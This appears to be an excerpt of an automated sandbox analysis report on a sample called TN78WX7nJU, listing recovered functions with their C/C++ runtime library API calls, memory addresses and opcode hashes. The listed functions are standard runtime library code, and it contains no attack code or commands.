Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction ID: ecb18499877976be64129c87880db9b40f2952d25c9d93d1b0c0aa07095992c1
Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction Fuzzy Hash: 2901F232700120B7DB12EE5A9801AFF77A99B94354F41005BFC11A7382DA24FD2192A8

Function 024A2B91 Relevance: 6.0, APIs: 4, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::location::_Assign.LIBCMT ref: 024A2BB1
Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 024A2BCF

Part of subcall function 02498687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 024986A8
Part of subcall function 02498687: Hash.LIBCMT ref: 024986E8

Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 024A2BD8
Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 024A2BF8

Part of subcall function 0249F6DF: Hash.LIBCMT ref: 0249F6F1

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
String ID:
API String ID: 2250070497-0
Opcode ID: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
Instruction ID: be4a4b3d581b6e66caf45d2d5b2ad42161672202806dbcd7acd34a4724b8dfce
Opcode Fuzzy Hash: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
Instruction Fuzzy Hash: 58012D76410604ABC714DF66C881EDAF7E9FF59310F008A1EE55687550DBB0F954CF60

Function 024850CA Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 024850D1

Part of subcall function 0248BDAE: __EH_prolog3_GS.LIBCMT ref: 0248BDB5

std::_Locinfo::_Locinfo.LIBCPMT ref: 0248511C
__Getcoll.LIBCPMT ref: 0248512B
std::_Locinfo::~_Locinfo.LIBCPMT ref: 0248513B

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID:
API String ID: 1836011271-0
Opcode ID: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
Instruction ID: 5a16ee00e9a584453990e86ad8480014c5bc187271322bba7073226ba3c9bbe9
Opcode Fuzzy Hash: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
Instruction Fuzzy Hash: B5018872D21208AFDB04FFA5C480BADBBB2BF54315F50802FD055AB280DB749584CFA1

Function 02485B86 Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 02485B8D

Part of subcall function 0248BDAE: __EH_prolog3_GS.LIBCMT ref: 0248BDB5

std::_Locinfo::_Locinfo.LIBCPMT ref: 02485BD8
__Getcoll.LIBCPMT ref: 02485BE7
std::_Locinfo::~_Locinfo.LIBCPMT ref: 02485BF7

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID:
API String ID: 1836011271-0
Opcode ID: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
Instruction ID: 00f1e3fa62b0cdf8d9b5797c7a9d18da9a67237fba80cabd9777ea8b6fb86896
Opcode Fuzzy Hash: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
Instruction Fuzzy Hash: 200148729212089FDB04FFA5D484BADBBB1BF54325F50802FD055AB280DBB89984CFA5

Function 0040591F Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00405926

Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E

std::_Locinfo::_Locinfo.LIBCPMT ref: 00405971
__Getcoll.LIBCPMT ref: 00405980
std::_Locinfo::~_Locinfo.LIBCPMT ref: 00405990

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID:
API String ID: 1836011271-0
Opcode ID: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
Instruction ID: 86b703767978d3f357e5c0a9ff64a1160fbba7df876fc0f231fbc64f2b881c41
Opcode Fuzzy Hash: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
Instruction Fuzzy Hash: 6C013271900208DFDB00EFA5C481B9EB7B0AF40328F10857EE055AB682DB789988CF98

Function 0249C13E Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0249C170
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0249C180
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0249C190
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0249C1A4

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: Compare_exchange_acquire_4std::_
String ID:
API String ID: 3973403980-0
Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction ID: 924b2012034765f75be822235018525e58794493cc26a8d2fd43b45b17ca7db3
Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction Fuzzy Hash: EA01C47A504149BBDF139E94EC828AE3F66AF6E350F088517F91884170D732C6B1EF85

Function 0041BED7 Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF09
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF19
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF29
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF3D

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: Compare_exchange_acquire_4std::_
String ID:
API String ID: 3973403980-0
Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction ID: a39f72e40e0a7d69bee2e58a2fbea005eb0d9eb8afdd5f219c4e4bdc303a66e9
Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction Fuzzy Hash: 3201FB3745414DBBCF119E64DD429EE3B66EB05354B188417F918C4231C336CAB2AF8D

Function 02493773 Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 0249378C

Part of subcall function 02492B16: ___crtGetTimeFormatEx.LIBCMT ref: 02492B2C
Part of subcall function 02492B16: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 02492B4B

GetLastError.KERNEL32 ref: 024937A8
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024937BE
__CxxThrowException@8.LIBVCRUNTIME ref: 024937CC

Part of subcall function 024928EC: SetThreadPriority.KERNEL32(?,?), ref: 024928F8

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
String ID:
API String ID: 1674182817-0
Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
Instruction ID: 8622be4b170f9abb9ea511820c72f3ce94b38cb5fe23583529433e6e242052c8
Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
Instruction Fuzzy Hash: 5EF0A7B2A002153ADB20FB765C0AFBB3EAC9B11B51F50496FB905E6181EED9D4048AB5

Function 0248D486 Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON

Download Yara Rule

APIs

Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 02491342

Part of subcall function 02490BB4: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 02490BD6
Part of subcall function 02490BB4: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 02490BF7

Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 02491355
Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 02491361
Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 0249136A

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
String ID:
API String ID: 4284812201-0
Opcode ID: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
Instruction ID: 56b10c06773fd70edfe384cd871a397b27aa1454853719aef869861930285ec3
Opcode Fuzzy Hash: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
Instruction Fuzzy Hash: 37F0B431640716ABAF247EBA081197E39A79F51314B04416FD51A9F3C0DFB19E019A94

Function 0040D21F Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON

Download Yara Rule

APIs

Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 004110DB

Part of subcall function 0041094D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041096F
Part of subcall function 0041094D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00410990

Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 004110EE
Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 004110FA
Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411103

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
String ID:
API String ID: 4284812201-0
Opcode ID: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
Instruction ID: 3d6a6adf541079fe7b6c6bfd004b769b4972a14d6898e3ab699feac8cff21146
Opcode Fuzzy Hash: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
Instruction Fuzzy Hash: 61F02B31B00204A7DF24BBA644526FE36564F44318F04413FBA12EB3D1DEBC9DC1925D

Function 0041350C Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 00413525

Part of subcall function 004128AF: ___crtGetTimeFormatEx.LIBCMT ref: 004128C5
Part of subcall function 004128AF: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 004128E4

GetLastError.KERNEL32 ref: 00413541
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00413557
__CxxThrowException@8.LIBVCRUNTIME ref: 00413565

Part of subcall function 00412685: SetThreadPriority.KERNEL32(?,?), ref: 00412691

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
String ID:
API String ID: 1674182817-0
Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
Instruction ID: 4f5043be301f020a87894878a43913a51c3f7b1e9493329acf7807e64a758140
Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
Instruction Fuzzy Hash: 69F0E2B1A002253AE724B6765D07FFB369C9B00B54F50091BB905E60C2EDDCE58042AC

Function 0249D074 Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0249D088
Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0249D0AC
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0249D0BF
__CxxThrowException@8.LIBVCRUNTIME ref: 0249D0CD

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
String ID:
API String ID: 3657713681-0
Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
Instruction ID: c2c36d04806251c681300089731a32846e2a6f0cdfc95268f4f24ee9a765d5f3
Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
Instruction Fuzzy Hash: EEF05235E00204E7CF24FB62D840CAEBB7A9E90B18760852FD80517285DF31A90ACEA2

Function 02485A67 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

std::_Cnd_initX.LIBCPMT ref: 02485A83
__Cnd_signal.LIBCPMT ref: 02485A8F
std::_Cnd_initX.LIBCPMT ref: 02485AA4
__Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 02485AAB

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
String ID:
API String ID: 2059591211-0
Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
Instruction ID: 7562e23720ca14c0881c1d58a19b0123a80bd25dcea8da757555e7901b0e7e6e
Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
Instruction Fuzzy Hash: B2F0E531520700EFEF227B73D80571E77A2AF01328F54482FE15A969A0CFBAE8558E55

Function 02492858 Relevance: 6.0, APIs: 4, Instructions: 29registryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 0249286F
GetLastError.KERNEL32(?,?,?,?,02498830,?,?,?,?,00000000,?,00000000), ref: 0249287E
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02492894
__CxxThrowException@8.LIBVCRUNTIME ref: 024928A2

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
String ID:
API String ID: 3803302727-0
Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
Instruction ID: aec0aaa7c62f9fe8312bde4c062f1fbaf414c32f16c8700e1188f910ade556e2
Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
Instruction Fuzzy Hash: 0FF0A03490010ABBCF00EFA5CD44EAF3BBCAB00B01F200616B910E20A0DB74D6049B64

Function 004125F1 Relevance: 6.0, APIs: 4, Instructions: 29registryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 00412608
GetLastError.KERNEL32(?,?,?,?,004185C9,?,?,?,?,00000000,?,00000000), ref: 00412617
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041262D
__CxxThrowException@8.LIBVCRUNTIME ref: 0041263B

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
String ID:
API String ID: 3803302727-0
Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
Instruction ID: 24969db738fe4d1a967b5a52fd3328d3273a2fbbb48021401f3901a8ee12547a
Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
Instruction Fuzzy Hash: 7FF0A03460010AFBCF00EFA5DE46EEF37687B00745F600616B610E20E1EB79DA549768

Function 0249257D Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

___crtCreateEventExW.LIBCPMT ref: 02492593
GetLastError.KERNEL32(?,?,?,?,?,02490DA0), ref: 024925A1
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024925B7
__CxxThrowException@8.LIBVCRUNTIME ref: 024925C5

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
String ID:
API String ID: 200240550-0
Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
Instruction ID: c27784b29f73ed2c89e834a075d5c1cdddc6492e16024abb30fdb0025740cf24
Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
Instruction Fuzzy Hash: DFE0D871A0021639EB10F7B64C12F7F3A9C9B10B41F44085BBD14E51C1FED4D10049A4

Function 00412316 Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

___crtCreateEventExW.LIBCPMT ref: 0041232C
GetLastError.KERNEL32(?,?,?,?,?,00410B39), ref: 0041233A
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412350
__CxxThrowException@8.LIBVCRUNTIME ref: 0041235E

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
String ID:
API String ID: 200240550-0
Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
Instruction ID: 785b6ff49928477fe7b23022ebabbc79c69e7cefd8d4159d1ac4e3541b52c9d2
Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
Instruction Fuzzy Hash: 01E0D871A0021929E710B7768E03FBF369C6B00B49F54096ABE14E51D3FDACD65042AC

Function 02499530 Relevance: 6.0, APIs: 4, Instructions: 26memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02492959: TlsAlloc.KERNEL32(?,02490DA0), ref: 0249295F

TlsAlloc.KERNEL32(?,02490DA0), ref: 024A3BE6
GetLastError.KERNEL32 ref: 024A3BF8
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024A3C0E
__CxxThrowException@8.LIBVCRUNTIME ref: 024A3C1C

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3735082963-0
Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
Instruction ID: 1ba54625472139bf85578ddc668998a8cdbcdc7dec36a2a7e15fa6a4bcc1ea00
Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
Instruction Fuzzy Hash: CDE02274500202AFCB00BF769CA9A7A7E69AA107017100A6BE925D21A1FA34D0068E68

Function 004192C9 Relevance: 6.0, APIs: 4, Instructions: 26memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004126F2: TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8

TlsAlloc.KERNEL32(?,00410B39), ref: 0042397F
GetLastError.KERNEL32 ref: 00423991
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004239A7
__CxxThrowException@8.LIBVCRUNTIME ref: 004239B5

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3735082963-0
Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
Instruction ID: d941d7adcdfcb95fe7f1ae92eeb0e95f25cd9e5dbb2d3936931fab3d4402dca1
Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
Instruction Fuzzy Hash: FEE02BB09002206EC300BF766C4A66E3274750130AB500B2BB151D21D2EEBCD1844A9D

Function 02492794 Relevance: 6.0, APIs: 4, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetNumaHighestNodeNumber.KERNEL32(?,00000000,?,02490DA0,?,?,?,00000000), ref: 0249279E
GetLastError.KERNEL32(?,?,?,00000000), ref: 024927AD
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024927C3
__CxxThrowException@8.LIBVCRUNTIME ref: 024927D1

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
String ID:
API String ID: 3016159387-0
Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
Instruction ID: 10975cf8d30a9dc56dda0ca23f26f8eaecd1c76986fdd7eab6668915f680aa8b
Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
Instruction Fuzzy Hash: E4E08074900109B7CF00FBB5DD45EAF77BC6A00B05B600566A501F3150EB65D7048B75

Function 0041252D Relevance: 6.0, APIs: 4, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetNumaHighestNodeNumber.KERNEL32(?,00000000,?,00410B39,?,?,?,00000000), ref: 00412537
GetLastError.KERNEL32(?,?,?,00000000), ref: 00412546
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041255C
__CxxThrowException@8.LIBVCRUNTIME ref: 0041256A

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
String ID:
API String ID: 3016159387-0
Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
Instruction ID: 7399f334bae95f1f5dd7aa6ec606231f62b338b040d4ba0de61eab0e9ab47a66
Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
Instruction Fuzzy Hash: A1E0D87060010AABC700EBB5DE4AAEF73BC7A00605B600166A101E2151EA6CDA44877C

Function 024928EC Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

SetThreadPriority.KERNEL32(?,?), ref: 024928F8
GetLastError.KERNEL32 ref: 02492904
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0249291A
__CxxThrowException@8.LIBVCRUNTIME ref: 02492928

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
String ID:
API String ID: 4286982218-0
Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
Instruction ID: 97b46cdfd56066b73664fa90e266908f4a3d7342817f65d22067273f228c63ed
Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
Instruction Fuzzy Hash: D7E086346001097BCF14FF72CC45FBB3B6CBB00B45B50092ABC15D20A1EF75D1048A98

Function 024929B2 Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE

Download Yara Rule

APIs

TlsSetValue.KERNEL32(?,00000000,02497BD8,00000000,?,?,02490DA0,?,?,?,00000000,?,00000000), ref: 024929BE
GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 024929CA
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024929E0
__CxxThrowException@8.LIBVCRUNTIME ref: 024929EE

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
String ID:
API String ID: 1964976909-0
Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
Instruction ID: c633e706738ef8ec576eb7664d22cfd30d45f5d3827684387e1aae06fce61679
Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
Instruction Fuzzy Hash: A0E04F746001097ADF10FF618C48BBB3A6CAB00B45B50092AB919D10A0EB75D1149AA8

